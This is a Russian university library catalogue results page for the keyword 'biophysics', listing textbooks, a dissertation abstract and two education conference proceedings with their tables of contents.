Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

121 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Биофизика")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 55
1. 
Лещенко, Вячеслав Григорьевич. Медицинская и биологическая физика [Текст] : учеб. пособие для студентов учреждений высш. образования по мед. специальностям / В. Г. Лещенко, Г. К. Ильич, 2012. - 551 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ВЫСШАЯ -- МАТЕМАТИКА -- ДИФФЕРЕНЦИАЛ -- ФУНКЦИЯ -- ПРОИЗВОДНАЯ -- ПЕРВООБРАЗНАЯ -- НЕОПРЕДЕЛЕННЫЙ -- ОПРЕДЕЛЕННЫЙ -- ИНТЕГРАЛ -- ДИФФЕРЕНЦИАЛЬНОЕ -- УРАВНЕНИЕ -- ВЕРОЯТНОСТЬ -- СЛУЧАЙНАЯ -- ВЕЛИЧИНА -- РАСПРЕДЕЛЕНИЕ -- СТАТИСТИКА -- БИОМЕХАНИКА -- КОЛЕБАНИЕ -- ВОЛНА -- АКУСТИКА -- ЖИДКОСТЬ -- СМАЧИВАНИЕ -- ПОВЕРХНОСТНОЕ -- ЯВЛЕНИЕ -- ГЕМОДИНАМИКА -- ПУАЗЕЙЛЯ -- МЕМБРАНА -- КЛЕТКА -- ДИПОЛЬ -- ИМПЕДАНС -- ПЕРЕМЕННЫЙ -- ТОК -- МАГНИТНОЕ -- ПОЛЕ -- ЭЛЕКТРОСТИМУЛЯЦИЯ -- ЭМП -- ТЕПЛОВОЕ -- ИЗЛУЧЕНИЕ -- ПОЛЯРИЗАЦИЯ -- СОЛНЦЕ -- ИНФРАКРАСНОЕ -- ТЕРМОГРАФИЯ -- ОПТИЧЕСКИЙ -- СПЕКТР -- АТОМ -- МОЛЕКУЛА -- ЛЮМИНЕСЦЕНЦИЯ -- ЛАЗЕР -- ЗРЕНИЕ -- ГЛАЗ -- ЛИНЗА -- ЛУПА -- МИКРОСКОП -- ЗОНДОВАЯ -- МИКРОСКОПИЯ -- ЭПР -- ЯМР -- РЕНТГЕНОВСКОЕ -- РАДИОАКТИВНОСТЬ -- ДОЗИМЕТРИЯ
Держатели документа (Информация об экземплярах) 

Рассмотрены физические процессы и явления, сопровождающие и обеспечивающие жизнедеятельность организма, а также физические основы как традиционных, так и современных методов диагностики и лечения. Использован удобный для усвоения порядок изложения материала: сначала физическая сторона изучаемого явления, а затем его медицинские и биологические приложения. В пособие включены также элементы высшей математики, теории вероятностей, основы статистики и корреляционного анализа в соответствии с типовой программой дисциплины.

2. 
Павлов, Андрей Николаевич. Биоинформатика [Текст] / А. Н. Павлов, Ю. М. Ермолаев ; под ред. А. Н. Павлова, 2010. - 254 с.
Держатели документа (Информация об экземплярах) 

Биоинформатика как самостоятельная научная дисциплина является, с одной стороны, новой отраслью науки, а с другой - по сути, является древнейшей ассоциативной наукой, призванной объяснить происхождение Вселенной.

3. 
Дарвин, Максим Евгеньевич. Неинвазивное определение концентрации каротиноидов в-каротина и ликопина в коже человека и других био-системах методом резонансной спектроскопии комбинационного рассеяния света [Текст] : автореф. дис. .. канд. физ.-мат. наук : 03.01.02 / Максим Евгеньевич Дарвин, 2010. - 19, [1] с.
Держатели документа (Информация об экземплярах) 
4. 
СВЧ-энергетика [Текст] : в 3 т. / под ред. Э. Окресса. Т. 3 : Применение энергии сверхвысоких частот в медицине, науке и технике / пер. с англ.: В. Г. Алыбина, Л. А. Музеус, Э. Я. Пастрона ; под ред. Э. Д. Шлифера, 1971. - 463, [1] с.
Держатели документа (Информация об экземплярах) 
5. 
Кац, Цецилия Бунимовна. Биофизика на уроках физики : книга для учителя : из опыта работы / Ц. К. Кац, 1988. - 159 с.
Держатели документа (Информация об экземплярах) 
6. 
Наука и образование : проблемы и перспективы : материалы региональной научно-практической конференции аспирантов, студентов и учащихся (18 - 19 апреля 2003 г.) : в 2-х ч.Ч. 1 / науч. ред. Н. А. Манаков, 2003. - 268 с.
Ключевые слова 
Оглавление 
  • Андреева, И. В. Развитие приемов логического мышления младших школьников на уроках математики / И. В. Андреева. - с.3
  • Андреева, Ирина Николаевна. Роль дидактической игры в воспитании гуманных взаимоотношений старших дошкольников / И. Н. Андреева. - с.2
  • Антонова, Марина Валерьевна. Влияние живописи и литературы на развитие речевых коммуникаций старших дошкольников / М. В. Антонова. - с.8
  • Ахметгалеева, З. М. Полоролевые идентификации при формировании Я-концепции в юношеском возрасте / З. М. Ахметгалеева. - с.11
  • Бауэр, Е. А. Развитие правильного звукопроизношения у умственно отсталых дошкольников посредством дидактических игр / Е. А. Бауэр. - с.15
  • Белькова, О. Ю. Развитие ответственности детей дошкольного возраста / О. Ю. Белькова. - с.18
  • Беспалова, Наталия Николаевна. Психофизиологическое развитие детей, воспитывающихся вне семьи / Н. Н. Беспалова. - с.21
  • Будич, Н. Ю. Уверенность в себе / Н. Ю. Будич. - с.24
  • Бурняшева, К. В. Развитие рефлексивного компонента продуктивного опыта младших школьников / К. В. Бурняшева. - с.28
  • Данилина, Т. В. Развитие грамматического строя речи у детей младшего дошкольного возраста посредством дидактических игр / Т. В. Данилина. - с.31
  • Дмитриевская, Вера Николаевна. Развитие коммуникативной компетенции как одно из условий развития личности младших школьников / В. Н. Дмитриевская. - с.33
  • Дмитриевский, А. А. К вопросу о личности как источнике психологических ресурсов / А. А. Дмитриевский. - с.36
  • Жемерина, Н. Г. Развитие цветовосприятия у старших дошкольников / Н. Г. Жемерина. - с.38
  • Жилякова, Л. К вопросу о развитии музыкального воображения у детей / Л. Жилякова. - с.39
  • Жукова, Е. А. Влияние мотивационно-ценностного отношения к труду на развитие образа "Я" младшего школьника / Е. А. Жукова. - с.41
  • Казанцева, О. А. Индивидуально-типические особенности ответственности / О. А. Казанцева. - с.44
  • Каширина, Л. А. Ошибки речи как фактор неуспеваемости младших школьников / Л. А. Каширина. - с.51
  • Керноз, О. С. Возрастные особенности ответственности / О. С. Керноз. - с.55
  • Колпакова, А. Д. Стиль педагогического общения как фактор формирования мотивационного отношения младших школьников к учебной деятельности / А. Д. Колпакова. - с.58
  • Кречетова, Ю. В. Творческое самовыражение учителя музыки / Ю. В. Кречетова. - с.64
  • Криволуцкая, Е. В. Педагогические условия развития творческих способностей детей дошкольного возраста / Е. В. Криволуцкая. - с.66
  • Кугай, Ольга Бахроновна. Реализация индивидуального подхода к леворуким учащимися в ДМШ при обучении игры на фортепиано / О. Б. Кугай. - с.69
  • Кузнецова, Т. В. Интегрированные домашние задания как условия предупреждения утомления младших школьников / Т. В. Кузнецова. - с.71
  • Кулакова, Д. В. Особенности проявления базовых личностных качеств подростка и необходимость их развития и коррекции средствами психологического воздействия / Д. В. Кулакова. - с.73
  • Лампман, В. Е. Влияние русских народных праздников на воспитание нравственного поведения детей старшего дошкольного возраста / В. Е. Лампман. - с.76
  • Литусова, Н. В. Развитие интонационной стороны речи детей среднего дошкольного возраста на занятиях по физическому воспитанию / Н. В. Литусова. - с.79
  • Марина, И. Е. Необходимость знания психологических особенностей юношества для предупреждения суицида / И. Е. Марина. - с.84
  • Петрова, О. Н. Общение как фактор воспитания личности младшего школьника / О. Н. Петрова. - с.87
  • Плесовских, Е. А. Влияние развития мелкой моторики кисти руки на речь дошкольника / Е. А. Плесовских. - с.89
  • Рычкова, Т. А. Личностно-ориентированное обучение дошкольников / Т. А. Рычкова. - с.91
  • Сажина, Елена. "Ученик познающий" как цель образовательного процесса / Е. Сажина. - с.93
  • Табакаева, Е. Н. Формирование познавательной активности учащихся / Е. Н. Табакаева. - с.96
  • Шубина, Л. В. Сравнительный анализ проявления любознательности учащихся с различным уровнем развития творческого мышления / Л. В. Шубина. - с.99
  • Шубина, Л. В. Направленность любознательности младших школьников с различным уровнем развития творческого мышления / Л. В. Шубина. - с.105
  • Алексеева, И. Н. Минимальная мозговая дисфункция с точки зрения современных психологов (актуальные вопросы) / И. Н. Алексеева. - с.107
  • Герасимов, А. В. Мотивация персонала к труду как аспект самоактуализации личности / А. В. Герасимов, О. А. Астаева. - с.110
  • Герасимов, А. В. Влияние потребностей на мотивационные отношения персонала к труду / А. В. Герасимов. - с.118
  • Герасимов, А. В. Мотивационные отношения и ценностные предпочтения субъекта / А. В. Герасимов. - с.122
  • Дроздов, А. П. Изменение гендерных ролей современного человека / А. П. Дроздов. - с.127
  • Ищенко, Е. В. Мозговые корреляты ригидности / Е. В. Ищенко. - с.129
  • Лямина, О. А. Роль социально-психологических факторов в вынашивании беременности / О. А. Лямина. - с.134
  • Назарова, В. Е. Некоторые вопросы истории становления психологии музыкального восприятия / В. Е. Назарова. - с.140
  • Повстян, Л. А. Системный подход к обоснованию развивающегося значения эстетических впечатлений в процессе арт-терапии / Л. А. Повстян. - с.148
  • Танасенко, И. В. Электрофизика человека / И. В. Танасенко, С. Е. Тонкова. - с.156
  • Толстихина, С. Ю. Биофизика памяти / С. Ю. Толстихина, М. Ю. Труфанова. - с.157
  • Фебенчукова, Анна Васильевна. Мозговые корреляты поведения субъекта / А. В. Фебенчукова, А. В. Фебенчуков. - с.158
  • Акжаркенова, Любовь Григорьевна. Педагогические основы управления внеучебной деятельностью учащихся (история вопроса) / Л. Г. Акжаркенова, М. Б. Исаева. - с.163
  • Беляева, Нина Игнатьевна. Самостоятельная работа по выбору - важное средство активизации познавательной активности студентов при изучении педагогических дисциплин / Н. И. Беляева. - с.168
  • Вдовин, Алексей Сергеевич. Процесс обучения / А. С. Вдовин. - с.171
  • Вдовин, Роман Сергеевич. Учет психологии учащихся в процессе современного педагогического тестирования / Р. С. Вдовин. - с.175
  • Вострецова, О. С. Патриотическое воспитание младших школьников как важный компонент формирования гражданской позиции / О. С. Вострецова. - с.178
  • Горчакова, Е. М. Формирование коммуникативных умений в процессе профессиональной подготовки педагога / Е. М. Горчакова. - с.181
  • Емельянова, И. В. Проблема организации научно-исследовательской деятельности студентов и пути ее решения / И. В. Емельянова. - с.182
  • Зотова, Татьяна Николаевна. Модель реализации преемственности в системе "ДОУ - начальная школа" / Т. Н. Зотова. - с.185
  • Иванова, О. Домашняя работа как средство формирования отношений "ученик - родители" / О. Иванова. - с.189
  • Иванова, Т. Школа будущего рождается уже сегодня / Т. Иванова. - с.190
  • Карпова, Н. Г. Педагогические аспекты преемственности общего и вузовского образования / Н. Г. Карпова. - с.193
  • Косова, Л. Н. Анализ эффективности учреждений дополнительного образования детей / Л. Н. Косова. - с.195
  • Левина, Марина Николаевна. Координация - основное условие функционирования ДОУ в образовательном пространстве / М. Н. Левина. - с.199
  • Михайленко, Т. Н. Коллективная творческая деятельность как средство подготовки учащихся к выбору профессии / Т. Н. Михайленко. - с.201
  • Назарова, А. Е. Педагогическая деятельность выдающихся музыкантов-исполнителей как фактор формирования отечественной пианистической школы / А. Е. Назарова. - с.204
  • Никитина, Елена Юрьевна. Проблемное обучение как фактор повышения эффективности процесса обучения / Е. Ю. Никитина. - с.207
  • Николаева, А. И. Внеклассная работа по математике в начальной школе / А. И. Николаева. - с.211
  • Падюков, Андрей Константинович. Творческий проект как основа предпрофильного и профильного обучения учащихся сельских школ / А. К. Падюков. - с.213
  • Петрова, Н. А. Разноуровневые задания как средство подготовки младших школьников к выбору профессии / Н. А. Петрова. - с.219
  • Петров, А. В. Развивающая и развивающаяся система образования XXI века / А. В. Петров. - с.222
  • Плотицына, Л. В. Реализация индивидуальных образовательных маршрутов на примере дисциплины "Графика" / Л. В. Плотицына, Е. В. Корначаева. - с.228
  • Поданева, М. А. Формирование профессиональной направленности студентов через реализацию межпредметных связей / М. А. Поданева. - с.231
  • Реутова, О. Г. История образования Кузнецкого края за 300 лет (XVII - XXI вв.) / О. Г. Реутова. - с.233
  • Романова, Л. А. Специфика деятельности организатора, руководителя и управленца в воспитательной работе факультета / Л. А. Романова. - с.236
  • Салькова, Т. М. Профессиональная мини-проба как средство подготовки младших школьников к выбору профессии / Т. М. Салькова. - с.240
  • Серебренникова, И. А. Средства и приемы реализации межпредметных связей / И. А. Серебренникова. - с.243
  • Синдеева, К. А. Национальная доктрина образования в Российской Федерации / К. А. Синдеева. - с.249
  • Сухих, М. Проспект деловой игры "Классный руководитель" / М. Сухих. - с.253
  • Терехина, М. В. Состояние тестирования в России / М. В. Терехина. - с.256
Держатели документа (Информация об экземплярах) 
7. 
Наука и образование : проблемы и перспективы : материалы международной научно-практической конференции аспирантов, студентов и учащихся (12 апреля 2002 г.) / сост. И. Н. Карнаева [и др.] ; науч. ред. Н. А. Манаков, 2002. - 360 с.
Оглавление 
  • Чернышова, Л. Н. К вопросу о психолого-педагогической подготовке студентов классического университета / Л. Н. Чернышова. - с.3
  • Чумакова, А. В. Особенности формирования профессионально-педагогической культуры личности педагога / А. В. Чумакова. - с.4
  • Гриднева, Людмила Викторовна. Исследование представлений студентов о гуманных отношениях в системе "Учитель - Ученик" / Л. В. Гриднева. - с.8
  • Гаврилова, Т. Г. Роль активности в формировании творческой личности / Т. Г. Гаврилова. - с.11
  • Беленкова, О. В. Организация исследовательской деятельности учащихся / О. В. Беленкова. - с.13
  • Зотова, Татьяна Николаевна. Проблема преемственности в системе "ДОУ - Начальная школа" / Т. Н. Зотова. - с.15
  • Зотова, Татьяна Николаевна. О готовности ребенка к обучению в школе / Т. Н. Зотова. - с.19
  • Ирбаева, С. Б. Проблема профессиональной адаптации будущих учителей в процессе педагогической практики / С. Б. Ирбаева. - с.23
  • Кормачев, Ю. С. Межпредметный факультатив как средство развития познавательной активности учащихся / Ю. С. Кормачев. - с.25
  • Еремина, А. А. Роль общения в развитии личности / А. А. Еремина. - с.27
  • Сафонов, Г. Н. Организационно-педагогическая модель профессиональной ориентации и довузовской подготовки лицеистов Бийского лицея / Г. Н. Сафонов. - с.28
  • Сухих, М. Деловая игра как средство профессионально-педагогической подготовки будущего учителя / М. Сухих. - с.33
  • Акеньшин, В. Н. Педагогические условия формирования осознания учащимися учебного материала / В. Н. Акеньшин. - с.34
  • Прохоров, О. Н. Оптимизация учебной и научной деятельности студентов на зооинженерном факультете / О. Н. Прохоров, Д. А. Грень, Э. Л. Тарновский. - с.37
  • Шипунова, О. Г. Нормативные функции принципа предметности в системе развивающего обучения / О. Г. Шипунова. - с.39
  • Апанасенко, Ольга Николаевна. Методы изучения воспитательного процесса при формировании ценностных ориентаций старшеклассников / О. Н. Апанасенко. - с.42
  • Шершнева, Е. В. Формирование речевой культуры будущего педагога / Е. В. Шершнева. - с.44
  • Южанинова, Е. Е. Роль межпредметных деловых игр в формировании навыков научной работы / Е. Е. Южанинова. - с.48
  • Волкова, О. С. К проблеме творческого развития личности студента / О. С. Волкова, К. А. Радько. - с.50
  • Гусейнов, Мамед Джамалович. Педагогические условия трансформации элементов технической подготовки учителя "технологии" в гуманитарную область дипломной работы / М. Д. Гусейнов. - с.53
  • Чичканова, Ирина Николаевна. Диагностика готовности к инновационной деятельности студентов, обучающихся в условиях УНПК / И. Н. Чичканова. - с.56
  • Мокрова, Л. А. ОРУ в системе воспитательной работы ВУЗА / Л. А. Мокрова. - с.59
  • Скворцов, А. Ученые-дидакты о развивающем обучении / А. Скворцов. - с.62
  • Четвергова, Наталья Евгеньевна. Моделирование структуры подготовки будущих учителей к работе с детьми в летнем оздоровительном лагере в рамках действующего стандарта / Н. Е. Четвергова. - с.64
  • Андреева, Т. В. О гражданской направленности личности студентов / Т. В. Андреева. - с.69
  • Сортыяков, Е. Д. О формировании навыков научной работы / Е. Д. Сортыяков. - с.72
  • Бобкова, М. Г. Проблема противоречий в обучении / М. Г. Бобкова. - с.75
  • Гербет, О. И. Доверие к себе как условие сохранения целостности личности / О. И. Гербет. - с.78
  • Ветрова, Н. Е. Развитие познавательной активности детей дошкольного возраста в игровой деятельности / Н. Е. Ветрова. - с.80
  • Старовойтова, Л. В. Психолого-педагогические условия развития познавательной активности детей младшего дошкольного возраста / Л. В. Старовойтова. - с.83
  • Подойма, Е. Ю. Об оптимальных стратегиях педагогического общения / Е. Ю. Подойма. - с.86
  • Колтыгина, Е. В. Оценка успешности информационной деятельности в диагностике психического развития школьников / Е. В. Колтыгина. - с.93
  • Куттыбаева, Н. Методика диагностики готовности детей к школе / Н. Куттыбаева. - с.96
  • Муханова, Г. Социальное окружение как фактор, влияющий на развитие личности / Г. Муханова. - с.101
  • Мардамшина, В. Применение метода "сказочного" семантического дифференциала в изучении личности школьника / В. Мардамшина. - с.107
  • Сычев, Олег Анатольевич. Отрицательный прогноз в общении в связи с фрустрацией базовых социальных потребностей / О. А. Сычев, О. Н. Дуракова. - с.109
  • Шубина, Л. В. Некоторые аспекты изучения творческого мышления / Л. В. Шубина. - с.113
  • Шагдарова, С. В. Социально-психологические особенности адаптации у детей-подростков / С. В. Шагдарова. - с.120
  • Глыбин, И. В. Синестезия акустических и визуальных ощущений / И. В. Глыбин. - с.120
  • Овчинников, Е. М. Понятие мотивации в психологии / Е. М. Овчинников. - с.121
  • Куксина, Н. А. Наркотическое цунами / Н. А. Куксина. - с.123
  • Суховеркова, Г. В. Психофизиологическое состояние студентов в процессе обучения в вузе / Г. В. Суховеркова. - с.125
  • Шумских, А. В. К проблеме методики преподавания психологии / А. В. Шумских. - с.132
  • Чинин, А. Н. Специфика обобщенных планов познавательной деятельности учащихся при изучении физики в системе развивающего обучения / А. Н. Чинин, О. П. Петрова. - с.134
  • Рупасова, Г. Б. Средства формирования приемов познавательной деятельности студентов при обучении физике по системе развивающего обучения / Г. Б. Рупасова. - с.136
  • Петров, А. В. Средства реализации эвристического подхода к физическим задачам в системе развивающего обучения / рук. работы. А. В. Петров. - с.138
  • Зеленкова, Т. Б. Особенности организации проектной работы в начальной школе / Т. Б. Зеленкова. - с.140
  • Карнаух, И. Е. Программно-тестовый подход к реализации принципа межпредметных связей в вузовском преподавании / И. Е. Карнаух. - с.143
  • Масалида, И. И. Использование математических знаний при решении задач по физике / И. И. Масалида. - с.144
  • Калинина, Н. И. Основные направления реализации исследовательской деятельности студентов в профессиональной подготовке учителя физики / Н. И. Калинина. - с.146
  • Андреева, Т. В. О гражданской направленности личности студентов / Т. В. Андреева. - с.149
  • Назарова, С. Н. Актуальность использования метода проектов в экологическом образовании младших школьников / С. Н. Назарова. - с.152
  • Назарова, С. Н. Воспитательные аспекты экологического образования младших школьников / С. Н. Назарова. - с.153
  • Сепетая, Н. Н. Развитие фонематического слуха у детей 4 - 6 лет / Н. Н. Сепетая. - с.154
  • Антюфьев, М. Ю. Реализация межпредметных связей в процессе моделирования уроков по физике / М. Ю. Антюфьев. - с.156
  • Будаева, Любовь Николаевна. О преподавании курса "Развивающее обучение в начальной школе / Л. Н. Будаева. - с.158
  • Караева, С. С. Современные требования к личности учителя музыки / С. С. Караева. - с.160
  • Ожогина, Е. В. Пластическое интонирование музыки как средства самовыражения ребенка / Е. В. Ожогина. - с.161
  • Мукушев, Б. А. Вопросы синергетики в содержании естественнонаучных дисциплин / Б. А. Мукушев. - с.162
  • Петровская, М. Н. Особенности освоения старшими дошкольниками художественного произведения / М. Н. Петровская. - с.166
  • Ланкина, Е. Е. Проблема активизации творчества младших школьников на уроках музыки / Е. Е. Ланкина, В. Солнцева. - с.169
  • Жемчужин, В. О. Анализ опыта разработки автоматизированной тестирующей программы / В. О. Жемчужин. - с.171
  • Сычев, Игорь Анатольевич. Диалог как средство активизации самостоятельной учебной деятельности учащихся старших классов на практических занятиях по информатике / И. А. Сычев. - с.174
  • Попова, Н. С. Проблема гуманизации содержания школьного математического образования / Н. С. Попова. - с.177
  • Петухов, А. Ю. Перспективы преподавания объектно-визуального программирования при обучении детей дошкольного возраста / А. Ю. Петухов. - с.179
  • Мошкин, Ю. Ю. Условия эффективного использования дистанционного обучения средствами Интернет / Ю. Ю. Мошкин. - с.182
  • Жунусова, Л. Х. Особенности компьютерного моделирования в управлении биосистем / Л. Х. Жунусова, Т. Н. Бияров. - с.185
  • Килибаева, С. К. Анализ процесса формирования и развития понятия из области электромагнетизма у учащихся старших классов / С. К. Килибаева, Б. Ш. Турысбекова, Б. М. Каланбеков. - с.188
  • Дорофеева, В. А. Особенности формообразования текста с эпиграфом после процедуры деформации / В. А. Дорофеева. - с.190
  • Волкова, А. М. Зачин как композиционно-структурный компонент текста / А. М. Волкова. - с.194
  • Михеева, М. С. Принципы семантизации и лексикализации слов / М. С. Михеева. - с.197
  • Пушкина, Е. С. Структурная организация и восприятие учебного текста / Е. С. Пушкина. - с.198
  • Коржнева, Елена Арнольдовна. Различные экспериментальные подходы к исследованию доминантного смысла текста / Е. А. Коржнева. - с.202
  • Моможокова, С. В. Сопоставительное изучение турецкого языка с алтайским / С. В. Моможокова. - с.208
  • Косинова, Л. А. Язык города как лингвосинергетический объект / Л. А. Косинова. - с.211
  • Солодянкина, Наталия Владимировна. Самоорганизация текста в аспекте изучения возрастных особенностей текстопорождения / Н. В. Солодянкина. - с.213
  • Бижан, Н. Б. Валовое содержание йода в почве и яровой пшенице в стадии кущения и колошения / Н. Б. Бижан. - с.218
  • Бузмакова, А. Г. Пути интеграции рыбоводства и тепличного овощеводства / А. Г. Бузмакова, Е. А. Грень. - с.219
  • Гулькина, Т. И. Сорбционная способность темно-каштановых почв Семипалатинского Прииртышья по отношению к ионам Pb2+ и Cu2+ / Т. И. Гулькина, А. М. Баирова. - с.220
  • Гайсина, Б. С. Валовое содержание йода в темно-каштановой почве и в различных сортах подсолнечника в стадии физиологической спелости / Б. С. Гайсина. - с.223
  • Панов, А. А. Оценка солево-минералогического состава вод / А. А. Панов. - с.224
  • Родикова, А. В. Проблемы экологии охраняемых территорий / А. В. Родикова. - с.226
  • Мубаракова, М. Ж. Тяжелые металлы (Pb, Cd, Zn,Cu) в атмосферных выпадениях на территории г. Семипалатинска / М. Ж. Мубаракова. - с.228
  • Куксина, Е. П. Изучение степени запыленности атмосферы с Алтайского / Е. П. Куксина, С. А. Огнева. - с.230
  • Огнева, С. А. К проблеме изучения гиполабильности микроэлементов в организме человека / С. А. Огнева. - с.231
  • Ордабаева, А. К. Содержание валового йода в растениях и почвах, взятых под различными сортами и на различных стадиях развития зерновых культур / А. К. Ордабаева. - с.233
  • Евлампиева, Е. П. Экотоксичность темно-каштановой почвы по отношению к проросткам яровой пшеницы при разных уровнях загрязнения цинком / Е. П. Евлампиева. - с.234
  • Екеева, А. Влияние физических факторов на урожайность некоторых растений / А. Екеева, Е. Баклыкова. - с.236
  • Танасенко, И. Биофизика экологии жилья / И. Танасенко, С. Тонкова. - с.237
  • Амиржанова, Г. З. Закономерности поведения кадмия в системе "светло-каштановая почва - проростки овса" при различной антропогенной нагрузке в условиях модельного опыта / Г. З. Амиржанова. - с.239
  • Толстихина, С. К проблеме акустического воздействия / С. Толстихина, М. Труфанова. - с.242
  • Карпова, Н. Г. Влияние солей тяжелых металлов на рост, развитие и активность ферментов Pisum Sativum / Н. Г. Карпова. - с.243
  • Браун, Л. История моей семьи в зеркале истории российских немцев / Л. Браун. - с.245
  • Байжуманова, Н. К. К вопросу о собирательстве кедрового ореха у кумандинцев в конце XIX - начале XX вв. / Н. К. Байжуманова. - с.250
  • Имидеева, И. В. Конкуренция и ее роль в развитии продовольственного рынка России / И. В. Имидеева, И. С. Цыренжапова. - с.252
  • Мирошников, Д. В. Теория человеческого капитала - основа экономического анализа высшей школы / Д. В. Мирошников. - с.253
  • Куттубаева, Т. А. Стратегический подход к профессиональной подготовке кадров на региональном рынке труда / Т. А. Куттубаева. - с.256
  • Назарова, О. Ю. Проблемы современного правового образования студентов педагогического вуза / О. Ю. Назарова. - с.260
  • Цыренжапова, И. С. Проблемы и перспективы развития малого предпринимательства в России / И. С. Цыренжапова, И. В. Имидеева. - с.264
  • Абдирова, А. Е. Уровень жизни и степень удовлетворения потребности населения в рыночных условиях / А. Е. Абдирова. - с.266
  • Лезнева, И. Ю. Рынок труда и занятость молодежи г. Бийска / И. Ю. Лезнева, О. В. Осипкова. - с.269
  • Чирков, Андрей Алексеевич. Крестьянское движение и община на Алтае в 1917 году / А. А. Чирков. - с.272
  • Колокольников, Р. О. Опыт внедрения системы управления финансами промышленного предприятия / Р. О. Колокольников. - с.277
  • Бегалинова, М. С. сущность и проблемы методологии образования в XXI веке / М. С. Бегалинова. - с.280
  • Бегалинова, М. С. Единство биосферы и человека / М. С. Бегалинова, А. С. Сансызбай. - с.284
  • Побережная, О. Н. Гражданское образование в "хрупком мире". Преодолевая ловушку модернизации / О. Н. Побережная. - с.288
  • Пекарская, Е. А. Влияние власти на формирование личности / Е. А. Пекарская. - с.292
  • Квашина, Е. В. Особенности развития идеи демократизации образования в России / Е. В. Квашина. - с.295
  • Казакова, Е. Сравнение направленности ценностных ориентаций российских и американских старшеклассников / Е. Казакова, Е. Худякова. - с.297
  • Фефелова, Е. Отношение тинейджеров к курению / Е. Фефелова. - с.300
  • Арефьев, Р. Л. Развитие личности и христианская религия / Р. Л. Арефьев. - с.303
  • Андреева, Е. В. Изучение антропологической готовности будущего учителя / Е. В. Андреева. - с.304
  • Юрова, О. А. Проблемы развития духовно-экологического туризма в Горном Алтае / О. А. Юрова. - с.310
  • Щапова, С. М. Дистанционное образование в системе обучения и повышения квалификации научно-педагогических кадров высшей школы / С. М. Щапова. - с.313
  • Горшунова, Татьяна Игоревна. Феномен американской улыбки / Т. И. Горшунова. - с.316
  • Бухарова, Т. Н. Эстетические идеи романтизма в музыке и их значение для современного музыкального образования / Т. Н. Бухарова. - с.319
  • Кучерова, Ю. В. Проблемы сохранения певческой традиции в старообрядческой культуре / Ю. В. Кучерова. - с.320
  • Кузнецова, Т. В. Мировоззрение и творчество / Т. В. Кузнецова. - с.322
  • Карпова, Н. Г. Личность как ценностная категория в философском учении Н. А. Бердяева / Н. Г. Карпова. - с.323
  • Комелькова, Л. А. Языческий мотивы в творчестве русских композиторов / Л. А. Комелькова. - с.325
  • Попов, И. В. К вопросу о конкурентоспособности выпускников педагогических вузов / И. В. Попов : 326
  • Горячкина, Е. Б. Исследование материала для изготовления термолюминесцентных детекторов ТЛД-К / Е. Б. Горячкина, Н. В. Сорокина. - с.331
  • Гаврилова, Я. Ю. Исследование процесса структурообразования молочно-соевых плавленых сыров / Я. Ю. Гаврилова. - с.333
  • Проскурина, В. Л. Новые технологи производства молочных десертов / В. Л. Проскурина. - с.334
  • Любимов, А. Г. Перспективная технология молочных продуктов с растительными полисахаридами / А. Г. Любимов. - с.337
  • Широкова, Е. Н. Творожные изделия лечебно-профилактического назначения / Е. Н. Широкова. - с.339
  • Акулова, Д. С. Применение энтеросорбентов в производстве экологически чистых пищевых продуктов / Д. С. Акулова, К. С. Жарыкбасова. - с.340
  • Шайхина, А. В. Перспективы разработки технологии молочных продуктов для специализированного питания / А. В. Шайхина. - с.342
Держатели документа (Информация об экземплярах) 
8. 
Наука и образование : проблемы и перспективы : материалы международной научно-практической конференции аспирантов, студентов и учащихся (12 апреля 2002 г.) / сост. И. Н. Карнаева [и др.] ; науч. ред. Н. А. Манаков, 2002. - 360 с.
Оглавление 
  • Чернышова, Л. Н. К вопросу о психолого-педагогической подготовке студентов классического университета / Л. Н. Чернышова. - с.3
  • Чумакова, А. В. Особенности формирования профессионально-педагогической культуры личности педагога / А. В. Чумакова. - с.4
  • Гриднева, Людмила Викторовна. Исследование представлений студентов о гуманных отношениях в системе "Учитель - Ученик" / Л. В. Гриднева. - с.8
  • Гаврилова, Т. Г. Роль активности в формировании творческой личности / Т. Г. Гаврилова. - с.11
  • Беленкова, О. В. Организация исследовательской деятельности учащихся / О. В. Беленкова. - с.13
  • Зотова, Татьяна Николаевна. Проблема преемственности в системе "ДОУ - Начальная школа" / Т. Н. Зотова. - с.15
  • Зотова, Татьяна Николаевна. О готовности ребенка к обучению в школе / Т. Н. Зотова. - с.19
  • Ирбаева, С. Б. Проблема профессиональной адаптации будущих учителей в процессе педагогической практики / С. Б. Ирбаева. - с.23
  • Кормачев, Ю. С. Межпредметный факультатив как средство развития познавательной активности учащихся / Ю. С. Кормачев. - с.25
  • Еремина, А. А. Роль общения в развитии личности / А. А. Еремина. - с.27
  • Сафонов, Г. Н. Организационно-педагогическая модель профессиональной ориентации и довузовской подготовки лицеистов Бийского лицея / Г. Н. Сафонов. - с.28
  • Сухих, М. Деловая игра как средство профессионально-педагогической подготовки будущего учителя / М. Сухих. - с.33
  • Акеньшин, В. Н. Педагогические условия формирования осознания учащимися учебного материала / В. Н. Акеньшин. - с.34
  • Прохоров, О. Н. Оптимизация учебной и научной деятельности студентов на зооинженерном факультете / О. Н. Прохоров, Д. А. Грень, Э. Л. Тарновский. - с.37
  • Шипунова, О. Г. Нормативные функции принципа предметности в системе развивающего обучения / О. Г. Шипунова. - с.39
  • Апанасенко, Ольга Николаевна. Методы изучения воспитательного процесса при формировании ценностных ориентаций старшеклассников / О. Н. Апанасенко. - с.42
  • Шершнева, Е. В. Формирование речевой культуры будущего педагога / Е. В. Шершнева. - с.44
  • Южанинова, Е. Е. Роль межпредметных деловых игр в формировании навыков научной работы / Е. Е. Южанинова. - с.48
  • Волкова, О. С. К проблеме творческого развития личности студента / О. С. Волкова, К. А. Радько. - с.50
  • Гусейнов, Мамед Джамалович. Педагогические условия трансформации элементов технической подготовки учителя "технологии" в гуманитарную область дипломной работы / М. Д. Гусейнов. - с.53
  • Чичканова, Ирина Николаевна. Диагностика готовности к инновационной деятельности студентов, обучающихся в условиях УНПК / И. Н. Чичканова. - с.56
  • Мокрова, Л. А. ОРУ в системе воспитательной работы ВУЗА / Л. А. Мокрова. - с.59
  • Скворцов, А. Ученые-дидакты о развивающем обучении / А. Скворцов. - с.62
